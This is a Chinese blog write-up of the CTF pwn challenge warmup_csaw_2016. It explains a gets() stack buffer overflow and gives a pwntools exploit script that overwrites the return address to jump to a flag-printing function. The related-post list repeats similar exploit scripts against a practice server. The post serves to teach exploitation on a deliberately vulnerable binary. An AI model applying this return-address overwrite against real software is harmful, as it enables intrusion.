warmup_csaw_2016

最新推荐文章于 2024-04-23 14:52:52 发布
最新推荐文章于 2024-04-23 14:52:52 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 菜狗子pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125901716
版权

文章目录

一、查看文件

先file ./warmup_csaw_2016查看文件类型再checksec --file=warmup_csaw_2016检查一下文件保护情况。
在这里插入图片描述
在这里插入图片描述

二、拖入IDA pro 中反编译

在这里插入图片描述用IDA Pro 64bit打开warmup_csaw_2016后按 F5 反汇编源码并查看主函数,发现 gets()函数读取输入到变量 v5 中, v5 的长度只有 0x40,即可用栈大小只有64字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。

在Functions window可以看到有一个sub_40060D()函数,按F5反汇编可以看到这是一个系统调用,且sub_40060D()函数的起始地址为0x40060D。
在这里插入图片描述
在这里插入图片描述

三、编写代码

from pwn import *
# remote()建立远程连接,指明ip和port
io = remote('node4.buuoj.cn', 26694)
payload = b'a'*(0x40 + 0x8) + p64(0x40060D)
io.sendline(payload) #发送数据
io.interactive() #与shell进行交互

在这里插入图片描述

总结

做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。
题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。
偏移量的计算=(数组本身大小+对应位的偏移 64位是 ox8 )
然后加上我们系统调用函数的地址。

长街395
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1240
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
warmup_csaw_2016 1
weixin_52034946的博客
01-13 813
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1704
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUU CTF PWN warmup_csaw_2016 WriteUp
m0sway的博客
02-27 226
BUU CTF PWNwarmup_csaw_2016的WriteUp
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
最新发布
weixin_58410275的博客
04-23 1008
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
标题提到的"PyPI 官网下载 | warmup_scheduler-0.3.tar.gz"是指从PyPI网站上下载的一个名为`warmup_scheduler`的Python库的0.3版本的压缩包文件。这个文件通常包含了库的所有源代码、文档和其他必要的资源,以便在...
markdown_warmup_html
05-28
在“markdown_warmup_html”这个主题中,我们可以深入探讨Markdown和HTML的关联及各自特点。首先,Markdown提供了一种简单易学的语法,如`#`表示标题,`*`和`_`用于斜体和粗体,`-`和`*`创建无序列表,以及`>`用于...
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
Workshop_warm_up
04-19
Workshop warm up 在蓝色框内增加圆圈 切换圆圈颜色 透过event target 改变其他元素 :warning:限制:只能透过event target去更改element的内容除了button可以使用querySelector外,其他都不能透过选取的方式得到DOM...
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 368
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 404
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
[BUUCTF]PWN------warmup_csaw_2016
BangSen1的博客
01-14 545
warmup_csaw_2016 例行检查 ,64位,无保护 运行一下,没什么信息。 用64位IDA打开,查看字符串,看到了cat flag,进去瞧瞧 可以看到这个函数的功能就是输出flag,记录下他的地址 flag_addr=0x40060D 再回到主函数瞧瞧,可以看到最后是输出了v5,gets函数并没有限制长度,因此存在溢出漏洞。v5的大小是0x40,因此只要我们输入的字符串长度=0x40+8(64位ebp的长度)即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可 得到fla
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1010
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 434
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
【BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3256
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3915
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值